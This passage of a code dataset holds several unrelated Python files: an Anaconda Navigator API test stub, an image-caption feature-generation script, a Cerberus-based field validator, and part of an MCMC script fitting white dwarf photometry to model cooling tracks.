pragma: no cover\n \"\"\"Print information on repodata updated.\"\"\"\n print(repos)\n\n\ndef test(): # pragma: no cover\n \"\"\"Main local test.\"\"\"\n from anaconda_navigator.utils.qthelpers import qapplication\n\n app = qapplication()\n api = AnacondaAPI()\n # 
api.sig_repodata_updated.connect(repodata_updated)\n # data_directory = tempfile.mkdtemp()\n # api.set_data_directory(data_directory)\n # worker = api.update_metadata()\n # worker.sig_download_finished.connect(download_finished)\n # api.update_repodata()\n lic = api.get_package_license('anaconda-fusion')\n print(lic)\n app.exec_()\n\n\nif __name__ == '__main__': # pragma: no cover\n test()\n","sub_path":"anaconda/anaconda/lib/python2.7/site-packages/anaconda_navigator/api/anaconda_api.py","file_name":"anaconda_api.py","file_ext":"py","file_size_in_byte":26943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"134877425","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*-\n# ==============================================================================\n# \\file gen-attention-feature.py\n# \\author chenghuige \n# \\date 2017-12-02 20:08:52.122757\n# \\Description \n# ==============================================================================\n\n \nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys, os\nimport glob \nimport numpy as np\nimport cPickle as pickle\nimport gezi\nimport math\n\nfrom deepiu.util import idf\n\nimport tensorflow as tf\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string('input_file', 'ensemble.train.detect.scene.lm.attention.txt', '')\nflags.DEFINE_string('type', 'valid', 'valid or test')\nflags.DEFINE_string('img_dir', '/home/gezi/data2/data/ai_challenger/image_caption/pic/', '')\n\nprint('type', FLAGS.type)\nif FLAGS.type == 'test':\n FLAGS.input_file = './ensemble.inference.feature.detect.scene.lm.attention.txt'\nofile = FLAGS.input_file.replace('.txt', '.logprobs.txt')\nprint('infile:', FLAGS.input_file, 'ofile:',ofile, file=sys.stderr)\n\nlogprobs_files = glob.glob('./*model*.evaluate-inference.logprobs.txt') if FLAGS.type == 'valid' \\\n else glob.glob('./*model*.inference.logprobs.txt')\n\nassert len(logprobs_files) == 19\n\nnames = []\nnames += ['sum', 'min', 'max', 'mean']\nnames += ['idf_sum', 'idf_min', 'idf_max', 'idf_mean']\nnames += ['count_de', 'count_he']\nnames = ['logprobs_' + x for x in names]\n\nfrom deepiu.util import vocabulary\nvocabulary.init('/home/gezi/mount/temp/image-caption/ai-challenger/tfrecord/seq-basic/vocab.txt')\nvocab = vocabulary.vocab\n\nidf_weights = idf.get_idf()\n\nm = {}\ncount_map = {}\n\ndef deal_logprobs(file):\n for i, line in enumerate(open(file)):\n # if i == 0:\n # continue\n if i % 1000 == 0:\n print(i, end='\\r', file=sys.stderr)\n l = line.strip().split('\\t')\n img, caption = l[0], l[1]\n words = caption.split()\n words.append('
')\n caption = caption.replace(' ', '')\n logprobs = l[-1].split()\n logprobs = map(float, logprobs)\n # TODO FIXME whey some(small ratio) caption with -inf not as expected num_words + 1(end mark) ?\n logprobs = [x for x in logprobs if x > -1000]\n if len(logprobs) < len(words):\n words = words[:-1]\n logprobs = np.array(logprobs)\n if img not in m:\n m[img] = {}\n count_map[img] = {}\n if caption not in m[img]:\n m[img][caption] = np.array([0.] * len(names))\n count_map[img][caption] = 0\n fe = m[img][caption]\n count_map[img][caption] += 1\n\n fe[0] += logprobs.sum() \n fe[1] += logprobs.min()\n fe[2] += logprobs.max() \n fe[3] += logprobs.mean()\n\n idf_logprobs = []\n for i, word in enumerate(words):\n idf_logprobs.append(idf_weights[vocab.id(word)] * math.exp(logprobs[i]))\n idf_logprobs = np.array(idf_logprobs)\n fe[4] += idf_logprobs.sum()\n fe[5] += idf_logprobs.min()\n fe[6] += idf_logprobs.max()\n fe[7] += idf_logprobs.mean()\n\n fe[8] += words.count('的')\n fe[9] += words.count('和')\n \nfor i, file in enumerate(logprobs_files):\n timer = gezi.Timer('deal %d %s' % (i, file))\n deal_logprobs(file)\n timer.print()\n\nwith open(ofile, 'w') as out:\n timer = gezi.Timer('merge previous features')\n is_header = True\n default_fe = [0.] * len(names)\n for line in open(FLAGS.input_file):\n l = line.strip().split('\\t')\n if is_header:\n names = l + names \n print('\\t'.join(names), file=out)\n with open('./feature_name.txt', 'w') as out_fname:\n for name in names[3:]:\n print(name, file=out_fname)\n is_header = False\n continue\n img, caption = l[0], l[1]\n \n if caption in m[img]:\n fe = m[img][caption]\n fe = [x / count_map[img][caption] for x in fe]\n else:\n fe = default_fe\n l += map(str, fe)\n print('\\t'.join(l), file=out)\n timer.print()\n\n ","sub_path":"deepiu/tools/ai-challenger/gbdt/gen-logprobs-feature.py","file_name":"gen-logprobs-feature.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"28916103","text":"\nimport datetime\nimport re\n\nfrom cerberus import Validator\n\nfrom .land_net_templates import land_net_ref\n\n\nclass SingleFieldValidator(Validator):\n def _validate_type_numeric(self, value):\n # check for numeric value\n try:\n float(value)\n except ValueError:\n return False\n\n return True\n\n def _validate_type_positive_numeric(self, value):\n # check for positive numeric value\n try:\n test_num = float(value)\n except ValueError:\n return False\n\n if test_num < 0:\n return False\n else:\n return True\n\n def _validate_valid_precision(self, valid_precision, field, value):\n \"\"\"\n # Check that precision is no more than 2 decimal places\n\n The rule's arguments are validated against this schema:\n {'valid_precision': False}\n \"\"\"\n error_message = \"Invalid Value, decimal precision error\"\n\n stripped_value = value.strip()\n test_split = stripped_value.split(\".\", 1)\n # there is a decimal, so need to check what's after it\n if len(test_split) > 1:\n if test_split[1] == \"\":\n self._error(field, error_message)\n else:\n # Check that only digits 0-9 exist after the decimal\n test_field = re.search('[^0-9]+', test_split[1])\n if test_field is not None:\n # There is something besides digits 0-9 after the decimal\n self._error(field, error_message)\n if len(test_split[1]) > 2:\n self._error(field, error_message)\n\n def _validate_is_empty(self, is_empty, field, value):\n \"\"\"\n # Since the value coming in could consist of spaces, check that a value of only 
spaces is considered null\n\n The rule's arguments are validated against this schema:\n {'valid_is_empty': False}\n \"\"\"\n stripped_value = value.strip()\n if not is_empty:\n if not stripped_value:\n self._error(field, \"Field must contain non whitespace characters\")\n\n def _validate_valid_special_chars(self, valid_special_chars, field, value):\n \"\"\"\n # Check that tab, #, *, \\, \", ^, _, and $ do not exist in field\n\n The rule's arguments are validated against this schema:\n {'valid_special_chars': True}\n \"\"\"\n if valid_special_chars:\n test_field = re.search(r'[\\t#*\\\\\\\"^_$]+', value)\n if test_field is not None:\n self._error(field, \"Invalid Character: contains tab, #, *, \\, \"\", ^, _, or $\")\n\n def _validate_valid_map_scale_chars(self, valid_map_scale_chars, field, value):\n \"\"\"\n # Check that characters other than 0-9 or a blank space do not exist in field\n\n The rule's arguments are validated against this schema:\n {'valid_map_scale_chars': True}\n \"\"\"\n if valid_map_scale_chars:\n test_field = re.search('[^0-9 ]+', value)\n if test_field is not None:\n # There is something besides digits 0-9 or space\n self._error(field, \"Invalid Character: contains a character other than 0-9\")\n\n def _validate_valid_instruments_chars(self, valid_instruments_chars, field, value):\n \"\"\"\n # Check that characters other than Y, N, or a blank space do not exist in field\n\n The rule's arguments are validated against this schema:\n {'valid_instruments_chars': True}\n \"\"\"\n if valid_instruments_chars:\n if not all(c.upper() in \"YN \" for c in value):\n self._error(field, \"Invalid Character: contains a character other than Y, N, or a blank space\")\n\n def _validate_valid_data_types_chars(self, valid_data_types_chars, field, value):\n \"\"\"\n # Check that character other than A, I, O, N, or a blank space do not exist in field\n\n The rule's arguments are validated against this schema:\n {'valid_data_types_chars': True}\n \"\"\"\n if valid_data_types_chars:\n if not all(c.upper() in \"AION \" for c in value):\n self._error(field, \"Invalid Character: contains a character other than A, I, O, N, or a blank space\")\n\n def _validate_valid_latitude_dms(self, valid_latitude_dms, field, value):\n # Check that field consists of valid degrees, minutes and second values\n\n \"\"\"\n The rule's arguments are validated against this schema:\n {'valid_latitude_dms': True}\n \"\"\"\n error_message = \"Invalid Degree/Minute/Second Value\"\n rstripped_value = value.rstrip()\n\n def check_100th_seconds(val):\n try:\n val[7] in [\".\"]\n test_split = val.split(\".\")\n # There is a decimal, but have to check if anything was split from it\n if test_split[1] == \"\":\n return False\n else:\n # Check that only digits 0-9 exist after the decimal\n test_field = re.search('[^0-9]+', test_split[1])\n if test_field is None:\n # There are only digits 0-9 after the decimal\n return True\n else:\n # There is something besides digits 0-9 after the decimal\n return False\n except IndexError:\n return True\n\n if valid_latitude_dms and rstripped_value:\n first_val = rstripped_value[0]\n check_degrees = rstripped_value[1:3]\n check_minutes = rstripped_value[3:5]\n check_seconds = rstripped_value[5:7]\n\n try:\n if not ((first_val in \"- \") and (0 <= int(check_degrees) <= 90) and (\n 0 <= int(check_minutes) < 60) and (0 <= int(check_seconds) < 60)\n and check_100th_seconds(rstripped_value)):\n self._error(field, error_message)\n except ValueError:\n return self._error(field, error_message)\n\n def 
_validate_valid_longitude_dms(self, valid_longitude_dms, field, value):\n # Check that field consists of valid degrees, minutes and second values\n\n \"\"\"\n The rule's arguments are validated against this schema:\n {'valid_longitude_dms': True}\n \"\"\"\n error_message = \"Invalid Degree/Minute/Second Value\"\n rstripped_value = value.rstrip()\n\n def check_100th_seconds(val):\n try:\n val[8] in [\".\"]\n test_split = val.split(\".\")\n # There is a decimal, but have to check if anything was split from it\n if test_split[1] == \"\":\n return False\n else:\n # Check that only digits 0-9 exist after the decimal\n test_field = re.search('[^0-9]+', test_split[1])\n if test_field is None:\n # There are only digits 0-9 after the decimal\n return True\n else:\n # There is something besides digits 0-9 after the decimal\n return False\n except IndexError:\n return True\n\n if valid_longitude_dms and rstripped_value:\n first_val = rstripped_value[0]\n check_degrees = rstripped_value[1:4]\n check_minutes = rstripped_value[4:6]\n check_seconds = rstripped_value[6:8]\n try:\n if not ((first_val in \"- \") and (0 <= int(check_degrees) <= 180) and (\n 0 <= int(check_minutes) < 60) and (0 <= int(check_seconds) < 60)\n and check_100th_seconds(rstripped_value)):\n self._error(field, error_message)\n except ValueError:\n return self._error(field, error_message)\n\n def _validate_valid_date(self, valid_date, field, value):\n # Check that field is a formatted date of YYYY, YYYYMM or YYYYMMDD\n\n \"\"\"\n The rule's arguments are validated against this schema:\n {'valid_date': True}\n \"\"\"\n error_message = \"Invalid Date, should be YYYY, YYYYMM or YYYYMMDD\"\n stripped_value = value.strip()\n if valid_date:\n # Check for valid full or partial date lengths\n if len(stripped_value) in [8, 6, 4]:\n # Check that only digits 0-9 exist in the string\n test_field = re.search('[^0-9]+', stripped_value)\n if test_field is None:\n # There are only digits 0-9 in the string\n check_year = stripped_value[0:4]\n check_month = stripped_value[4:6]\n if not 1582 <= int(check_year) <= int(datetime.date.today().year):\n self._error(field, error_message)\n if len(stripped_value) == 8:\n try:\n valid_date = datetime.datetime.strptime(stripped_value, '%Y%m%d')\n except ValueError:\n return self._error(field, error_message)\n if check_month:\n if not 1 <= int(check_month) <= 12:\n self._error(field, error_message)\n\n else:\n self._error(field, error_message)\n else:\n self._error(field, error_message)\n\n def _validate_valid_land_net(self, valid_land_net, field, value):\n # Check that the land net description field follows the correct template\n\n \"\"\"\n The rule's arguments are validated against this schema:\n {'valid_land_net': True}\n \"\"\"\n error_message = \"Invalid format - Land Net does not fit template\"\n\n if valid_land_net:\n land_net_template = land_net_ref[\"55\"]\n value_end = len(value) - 1\n section = land_net_template.index(\"S\")\n township = land_net_template.index(\"T\")\n range = land_net_template.index(\"R\")\n try:\n if not (value[section] == \"S\" and value[township] == \"T\" and value[range] == \"R\"):\n return self._error(field, error_message)\n test_match = re.search('[^a-zA-Z0-9 ]', value[section:value_end])\n if test_match is not None:\n return self._error(field, error_message)\n except IndexError:\n return self._error(field, 
error_message)\n","sub_path":"mlrvalidator/validators/single_field_validator.py","file_name":"single_field_validator.py","file_ext":"py","file_size_in_byte":10573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"408397685","text":"import multiprocessing as mp\nimport os\nfrom enum import Enum\nimport copy\n\nimport configobj\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport emcee\nimport scipy.interpolate as interp\nfrom astropy.stats import sigma_clipped_stats\n\nfrom utils import read_chain\nfrom mcmc_utils import (\n flatchain,\n initialise_walkers,\n run_burnin,\n run_mcmc_save,\n thumbPlot,\n)\nfrom model import Param\n\n# import warnings\n\n\n# Location of data tables\nROOT, _ = os.path.split(__file__)\n\n\ndef ln_prior(vect, model):\n # first we update the model to use the pars suggested by the MCMC chain\n for i in range(model.npars):\n model[i] = vect[i]\n\n lnp = 0.0\n\n # teff, (usually uniform between allowed range - 6 to 90,000)\n param = model.teff\n lnp += param.prior.ln_prob(param.currVal)\n\n # logg, uniform between allowed range (7.01 to 8.99), or Gaussian from constraints\n param = model.logg\n lnp += param.prior.ln_prob(param.currVal)\n\n # Parallax, gaussian prior of the gaia value.\n param = model.plax\n lnp += param.prior.ln_prob(param.currVal)\n\n # enforce +ve parallax\n if model.plax.currVal <= 0:\n return -np.inf\n\n # reddening, cannot exceed galactic value (should estimate from line of sight)\n # https://irsa.ipac.caltech.edu/applications/DUST/\n param = model.ebv\n lnp += param.prior.ln_prob(param.currVal)\n return lnp\n\n\ndef ln_likelihood(vect, model):\n # first we update the model to use the pars suggested by the MCMC chain\n for i in range(model.npars):\n model[i] = vect[i]\n return -0.5 * model.chisq()\n\n\ndef ln_prob(vect, model):\n lnp = ln_prior(vect, model)\n if np.isfinite(lnp):\n lnp += ln_likelihood(vect, model)\n if np.isnan(lnp):\n lnp = -np.inf\n return lnp\n\n\ndef sdss2kg5(g, r):\n KG5 = g - 0.2240 * (g - r) ** 2 - 0.3590 * (g - r) + 0.0460\n return KG5\n\n\nsdss2kg5_vect = np.vectorize(sdss2kg5)\n\n\ndef sdssmag2flux(mag):\n return 3631e3 * np.power(10, -0.4 * mag)\n\n\nclass PhotometricSystem(Enum):\n SDSS = \"SDSS\"\n HCAM = \"HCAM\"\n UCAM_SDSS = \"UCAM_SDSS\"\n UCAM_SUPER = \"UCAM_SUPER\"\n USPEC = \"USPEC\"\n\n @property\n def bergeron_table(self):\n \"\"\"\n Name of correct table for Bergeron mags\n \"\"\"\n if self.name == \"SDSS\":\n return os.path.join(ROOT, \"Bergeron/Table_DA_sdss\")\n else:\n return os.path.join(ROOT, \"Bergeron/Table_DA\")\n\n def color_correction_data(self, band):\n \"\"\"\n Information needed for correction from Bergeron table to this band\n\n Parameters\n ----------\n band: str\n e.g u, g, r, i, z\n\n Returns\n -------\n table: str\n Path to color correction tables\n column: str\n Name of column to read from table for correction\n \"\"\"\n if self.name == \"USPEC\":\n table = os.path.join(\n ROOT,\n \"Bergeron/color_correction_tables/color_corrections_HCAM-GTC-super_minus_tnt_uspec.csv\",\n )\n column = band\n elif self.name == \"SDSS\" or self.name == \"HCAM\":\n table = None\n column = None\n else:\n table = os.path.join(\n ROOT,\n \"Bergeron/color_correction_tables/color_corrections_HCAM-GTC-super_minus_ntt_ucam.csv\",\n )\n column = f\"{band}_s\" if \"SUPER\" in self.name else band\n return table, column\n\n def central_wavelength(self, band):\n super_lambda_c = {\n \"u\": 352.6,\n \"g\": 473.2,\n \"r\": 619.9,\n 
\"i\": 771.1,\n \"z\": 915.6,\n }\n lambda_c = {\n \"u\": 355.7,\n \"g\": 482.5,\n \"r\": 626.1,\n \"i\": 767.2,\n \"z\": 909.7,\n \"kg5\": 507.5,\n }\n lambda_c_dict = (\n super_lambda_c if self.name in [\"HCAM\", \"UCAM_SUPER\"] else lambda_c\n )\n return lambda_c_dict[band]\n\n\nclass Flux(object):\n BANDS = [\"u\", \"g\", \"r\", \"i\", \"z\"]\n # Multiply E(B-V) by these numbers to get extinction in each band\n # from Schlafly & Finkbeiner (2011) @ R_V = 3.1\n EXTINCTION_COEFFS = {\n \"u\": 4.239,\n \"g\": 3.303,\n \"r\": 2.285,\n \"i\": 1.698,\n \"z\": 1.263,\n \"kg5\": 2.751,\n }\n\n def __init__(self, val, err, photometric_system, band, syserr=0.03):\n \"\"\"\n Representation of an observed WD flux\n\n Parameters\n ----------\n val, err: float\n Observed value and error\n photometric_system: PhotometricSystem\n The system this flux is observed in e.g SDSS or HCAM\n band: str\n Name of filter, e.g 'u', 'g' etc.\n\n Do not use values like 'g_s' here, that is taken\n care of in the photometric system\n syserr: float\n Additional systematic error added to account for calibration\n issues.\n \"\"\"\n self.flux = val\n self.err = np.sqrt(err**2 + (val * syserr) ** 2)\n\n # This is the actual band observed with.\n self.photometric_system = photometric_system\n self.band = band\n self.mag = 2.5 * np.log10(3631e3 / self.flux)\n self.magerr = 2.5 * 0.434 * (self.err / self.flux)\n\n # Create an interpolater for the color corrections\n correction_table_name, column = photometric_system.color_correction_data(\n self.band\n )\n if correction_table_name is not None:\n correction_table = pd.read_csv(correction_table_name)\n self.correction_func = interp.LinearNDInterpolator(\n correction_table[[\"Teff\", \"logg\"]], correction_table[column]\n )\n else:\n self.correction_func = None\n\n # Create an interpolator for the Bergeron table\n DA = pd.read_csv(\n photometric_system.bergeron_table,\n delim_whitespace=True,\n skiprows=0,\n header=1,\n )\n self.bergeron_func = interp.LinearNDInterpolator(\n DA[[\"Teff\", \"log_g\"]], DA[band]\n )\n\n def __repr__(self):\n return \"Flux(val={:.3f}, err={:.3f}, photometric_system={}, band={})\".format(\n self.flux, self.err, self.photometric_system, self.band\n )\n\n @property\n def extinction_coefficient(self):\n return self.EXTINCTION_COEFFS[self.band]\n\n @property\n def central_wavelength(self):\n return self.photometric_system.central_wavelength(self.band)\n\n\nclass WDModel:\n \"\"\"\n Model for calculating WD Fluxes\n\n Can be passed to MCMC routines for calculating model and chisq, and prior prob\n\n This class also behaves like a list, of the current values of all parameters\n this enables it to be seamlessly used with emcee\n\n Note that parallax should be provided in MILLIarcseconds.\n\n Parameters\n -----------\n teff, logg, plax, ebv: `mcmc_utils.Param`\n Fittable parameters.\n fluxes: list(Flux)\n A list of observed fluxes.\n \"\"\"\n\n # arguments are Param objects (see mcmc_utils)\n def __init__(self, teff, logg, plax, ebv, fluxes):\n self.teff = teff\n self.logg = logg\n self.plax = plax\n self.ebv = ebv\n\n # initialise list bit of object with parameters\n self.variables = [self.teff, self.logg, self.plax, self.ebv]\n\n # Observed data\n self.obs_fluxes = copy.copy(fluxes)\n\n # these routines are needed so object will behave like a list\n def __getitem__(self, ind):\n return self.variables[ind].currVal\n\n def __setitem__(self, ind, val):\n self.variables[ind].currVal = val\n\n def __delitem__(self, ind):\n self.variables.remove(ind)\n\n def 
__len__(self):\n return len(self.variables)\n\n def insert(self, ind, val):\n self.variables.insert(ind, val)\n\n @property\n def npars(self):\n return len(self.variables)\n\n @property\n def dist(self):\n if self.plax.currVal <= 0.0:\n return np.inf\n else:\n return 1000.0 / self.plax.currVal\n\n def __repr__(self):\n return \"WDModel(teff={:.1f}, logg={:.2f}, plax={:.3f}, ebv={:.1f})\".format(\n self.teff.currVal,\n self.logg.currVal,\n self.plax.currVal,\n self.ebv.currVal,\n )\n\n @property\n def apparent_mags(self):\n \"\"\"\n Calculate apparent magnitudes for each of my observed fluxes\n \"\"\"\n mags = []\n t, g = self.teff.currVal, self.logg.currVal\n # Distance modulus\n dmod = -5.0 * np.log10(self.plax.currVal / 100)\n for flux in self.obs_fluxes:\n abs_mag = flux.bergeron_func(t, g)\n # correction from magnitude in bergeron table to observed system\n if flux.correction_func is None:\n correction = 0\n else:\n correction = flux.correction_func(t, g)\n # correction is Bergeron System - Observed System\n # correct to OBSERVED system\n abs_mag -= correction\n # apply distance modulus\n mag = abs_mag + dmod\n\n # apply exinction\n extinction = self.ebv.currVal * flux.extinction_coefficient\n mag += extinction\n mags.append(mag)\n\n return np.array(mags)\n\n def chisq(self):\n \"\"\"Calculate Chisq\"\"\"\n\n mags = self.apparent_mags\n predicted_fluxes = sdssmag2flux(mags)\n observed_fluxes = np.array([f.flux for f in self.obs_fluxes])\n errors = np.array([f.err for f in self.obs_fluxes])\n # Chi-squared\n chisq = np.power(((predicted_fluxes - observed_fluxes) / errors), 2)\n chisq = np.sum(chisq)\n\n return chisq\n\n\ndef plotColors(model, fname=\"colorplot.pdf\"):\n print(\"\\n\\n-----------------------------------------------\")\n print(\"Creating color plots...\")\n _, ax = plt.subplots(figsize=(6, 6))\n\n # OBSERVED DATA\n flux_u = [obs for obs in model.obs_fluxes if \"u\" in obs.band][0]\n flux_g = [obs for obs in model.obs_fluxes if \"g\" in obs.band][0]\n flux_r = [obs for obs in model.obs_fluxes if \"r\" in obs.band][0]\n print(\"Observations:\\n {}\\n {}\\n {}\".format(flux_u, flux_g, flux_r))\n\n obs_ug_err = np.sqrt((flux_u.magerr**2) + (flux_g.magerr**2))\n obs_gr_err = np.sqrt((flux_g.magerr**2) + (flux_r.magerr**2))\n\n # Correct magnitudes to the Bergeron frame\n t, g = model.teff.currVal, model.logg.currVal\n u_mag = flux_u.bergeron_mag(t, g)\n g_mag = flux_g.bergeron_mag(t, g)\n r_mag = flux_r.bergeron_mag(t, g)\n\n if model.DEBUG:\n print(\"Observation, uncorrected for IS extinction:\")\n print(\n \" Magnitudes:\\n u: {}\\n g: {}\\n r: {}\".format(\n u_mag, g_mag, r_mag\n )\n )\n\n # subtract interstellar extinction\n ex = model.ebv\n u_mag -= model.extinction_coefficients[\"u_s\"] * ex.currVal\n g_mag -= model.extinction_coefficients[\"g_s\"] * ex.currVal\n r_mag -= model.extinction_coefficients[\"r_s\"] * ex.currVal\n\n print(\"After correcting (if necessary), and removing IS extinction:\")\n print(\n \" Magnitudes:\\n u: {}\\n g: {}\\n r: {}\".format(u_mag, g_mag, r_mag)\n )\n\n ug_mag = u_mag - g_mag\n gr_mag = g_mag - r_mag\n\n print(\n \"Observed Colors in the HCAM/GTC/super lightpath (corrected for IS extinction):\"\n )\n print(\"u-g = {:> 5.3f}+/-{:< 5.3f}\".format(ug_mag, obs_ug_err))\n print(\"g-r = {:> 5.3f}+/-{:< 5.3f}\".format(gr_mag, obs_gr_err))\n\n # Generate the model's apparent magnitudes (no atmosphere, no IS extinction), and plot that color too\n # Get absolute magnitudes\n abs_mags = model.gen_absolute_mags()\n # Apply distance modulus\n dmod = 
5.0 * np.log10(model.dist / 10.0)\n modelled_mags = abs_mags + dmod\n\n # Calculate the colours\n bands = [obs.orig_band for obs in model.obs_fluxes]\n u_index = bands.index(flux_u.orig_band)\n g_index = bands.index(flux_g.orig_band)\n r_index = bands.index(flux_r.orig_band)\n if model.DEBUG:\n print(\n \"Bergeron model interpolations for T: {:.0f}, log(g): {:.3f}...\".format(\n model.teff.currVal, model.logg.currVal\n )\n )\n print(\"Observed bands: {}\".format(bands))\n print(\"Modelled mags: {}\".format(modelled_mags))\n print(\"Indexes|| u: {} || g: {} || r: {}\\n\".format(u_index, g_index, r_index))\n\n model_ug = modelled_mags[u_index] - modelled_mags[g_index]\n model_gr = modelled_mags[g_index] - modelled_mags[r_index]\n\n # bergeron model magnitudes, will be plotted as tracks\n bergeron_umags = np.array(model.DA[\"u_s\"])\n bergeron_gmags = np.array(model.DA[\"g_s\"])\n bergeron_rmags = np.array(model.DA[\"r_s\"])\n\n # calculate colours\n ug = bergeron_umags - bergeron_gmags\n gr = bergeron_gmags - bergeron_rmags\n\n # make grid of teff, logg from the bergeron table\n teffs = np.unique(model.DA[\"Teff\"])\n loggs = np.unique(model.DA[\"log_g\"])\n nteff = len(teffs)\n nlogg = len(loggs)\n # reshape colours onto 2D grid of (logg, teff)\n ug = ug.reshape((nlogg, nteff))\n gr = gr.reshape((nlogg, nteff))\n\n # Plotting\n # Bergeron cooling tracks and isogravity contours\n for a in range(nlogg):\n ax.plot(ug[a, :], gr[a, :], \"k-\")\n for a in range(0, nteff, 4):\n ax.plot(ug[:, a], gr[:, a], \"r--\")\n\n # Observed color\n ax.errorbar(\n x=ug_mag,\n y=gr_mag,\n xerr=obs_ug_err,\n yerr=obs_gr_err,\n fmt=\"o\",\n ls=\"none\",\n color=\"darkred\",\n capsize=3,\n label=\"Observed\",\n )\n\n # Modelled color\n ax.errorbar(\n x=model_ug,\n y=model_gr,\n fmt=\"o\",\n ls=\"none\",\n color=\"blue\",\n capsize=3,\n label=\"Modelled - T: {:.0f} | logg: {:.2f}\".format(t, g),\n )\n\n # annotate for teff\n xa = ug[0, 4] + 0.03\n ya = gr[0, 4]\n val = teffs[4]\n t = ax.annotate(\n \"T = %d K\" % val,\n xy=(xa, ya),\n color=\"r\",\n horizontalalignment=\"left\",\n verticalalignment=\"center\",\n size=\"small\",\n )\n t.set_rotation(0.0)\n\n xa = ug[0, 8] + 0.03\n ya = gr[0, 8]\n val = teffs[8]\n t = ax.annotate(\n \"T = %d K\" % val,\n xy=(xa, ya),\n color=\"r\",\n horizontalalignment=\"left\",\n verticalalignment=\"center\",\n size=\"small\",\n )\n t.set_rotation(0.0)\n\n xa = ug[0, 20] + 0.01\n ya = gr[0, 20] - 0.01\n val = teffs[20]\n t = ax.annotate(\n \"T = %d K\" % val,\n xy=(xa, ya),\n color=\"r\",\n horizontalalignment=\"left\",\n verticalalignment=\"top\",\n size=\"small\",\n )\n t.set_rotation(0.0)\n\n xa = ug[0, 24] + 0.01\n ya = gr[0, 24] - 0.01\n val = teffs[24]\n t = ax.annotate(\n \"T = %d K\" % val,\n xy=(xa, ya),\n color=\"r\",\n horizontalalignment=\"left\",\n verticalalignment=\"top\",\n size=\"small\",\n )\n t.set_rotation(0.0)\n\n ax.set_xlabel(\"{}-{}\".format(flux_u.orig_band, flux_g.orig_band))\n ax.set_ylabel(\"{}-{}\".format(flux_g.orig_band, flux_r.orig_band))\n ax.set_xlim([-0.5, 1])\n ax.set_ylim([-0.5, 0.5])\n ax.legend()\n\n plt.savefig(fname)\n plt.show()\n\n print(\"Done!\")\n print(\"-----------------------------------------------\\n\")\n\n\ndef plotFluxes(model, fname=\"fluxplot.pdf\"):\n \"\"\"\n Plot observed fluxes vs model fluxes\n \"\"\"\n model_mags = model.apparent_mags\n model_flx = sdssmag2flux(model_mags)\n # Central wavelengths for the bands\n lambdas = np.array([obs.central_wavelength for obs in model.obs_fluxes])\n obs_flx = [obs.flux for obs in 
model.obs_fluxes]\n obs_flx_err = [obs.err for obs in model.obs_fluxes]\n\n # Do the actual plotting\n _, ax = plt.subplots(figsize=(5, 5))\n ax.errorbar(\n lambdas,\n model_flx,\n xerr=None,\n yerr=None,\n fmt=\"P\",\n ls=\"none\",\n color=\"darkred\",\n label=\"Modelled apparent flux\",\n markersize=6,\n linewidth=1,\n capsize=None,\n )\n ax.errorbar(\n lambdas,\n obs_flx,\n xerr=None,\n yerr=obs_flx_err,\n fmt=\"o\",\n ls=\"none\",\n color=\"blue\",\n label=\"Observed flux\",\n markersize=6,\n linewidth=1,\n capsize=None,\n )\n ax.set_xlabel(\"Wavelength, nm\")\n ax.set_ylabel(\"Flux, mJy\")\n ax.legend()\n\n plt.tight_layout()\n plt.savefig(fname)\n plt.close(\"all\")\n\n\nif __name__ == \"__main__\":\n LOGFILE = open(\"WDPARAMS.LOGS\", \"w\")\n\n # Allows input file to be passed to code from argument line\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Fit WD Fluxes\")\n parser.add_argument(\"file\", action=\"store\", help=\"input file\")\n args = parser.parse_args()\n\n # Use parseInput function to read data from input file\n input_dict = configobj.ConfigObj(args.file)\n\n # Read information about mcmc, priors, neclipses, sys err\n nburn = int(input_dict[\"nburn\"])\n nprod = int(input_dict[\"nprod\"])\n nthread = int(input_dict[\"nthread\"])\n nwalkers = int(input_dict[\"nwalkers\"])\n scatter = float(input_dict[\"scatter\"])\n thin = int(input_dict[\"thin\"])\n toFit = int(input_dict[\"fit\"])\n\n # Grab the variables\n teff = Param.fromString(\"teff\", input_dict[\"teff\"])\n logg = Param.fromString(\"logg\", input_dict[\"logg\"])\n plax = Param.fromString(\"plax\", input_dict[\"plax\"])\n ebv = Param.fromString(\"ebv\", input_dict[\"ebv\"])\n syserr = float(input_dict[\"syserr\"])\n chain_file = input_dict.get(\"chain\", None)\n\n # Logging\n LOGFILE.write(\"Fitting White Dwarf fluxes to model cooling tracks...\\n\")\n LOGFILE.write(\"Running fit from the following input file:\\n\")\n LOGFILE.write(\"#################################\\n\\n\")\n LOGFILE.write(open(args.file, \"r\").read())\n LOGFILE.write(\"#################################\\n\\n\")\n LOGFILE.write(\"Setting up fluxes...\\n\\n\")\n\n # # # # # # # # # # # #\n # Load in chain file #\n # # # # # # # # # # # #\n if chain_file is None:\n colKeys = []\n fluxes = []\n else:\n print(\"Reading in the chain file,\", chain_file)\n colKeys, chain = read_chain(chain_file)\n print(\"Done!\")\n\n # Extract the fluxes from the chain file, and create a list of Fux objects from that\n chain_bands = [\n key.lower().replace(\"wdflux_\", \"\")\n for key in colKeys\n if \"wdflux\" in key.lower()\n ]\n print(\"I found the following bands in the chain file:\")\n systems = input_dict[\"photometric_systems\"]\n for band in chain_bands:\n print(\"\\t{} ({})\".format(band, systems.get(band, None)))\n print(\"\\n\\n\\n\")\n\n fluxes = []\n for band in chain_bands:\n # TODO: Add KG5 fluxes.\n if band == \"kg5\":\n LOGFILE.write(\"KG5 BANDS ARE CURRENTLY UNUSED. SKIPPING\")\n print(\"KG5 BANDS ARE CURRENTLY UNUSED. 
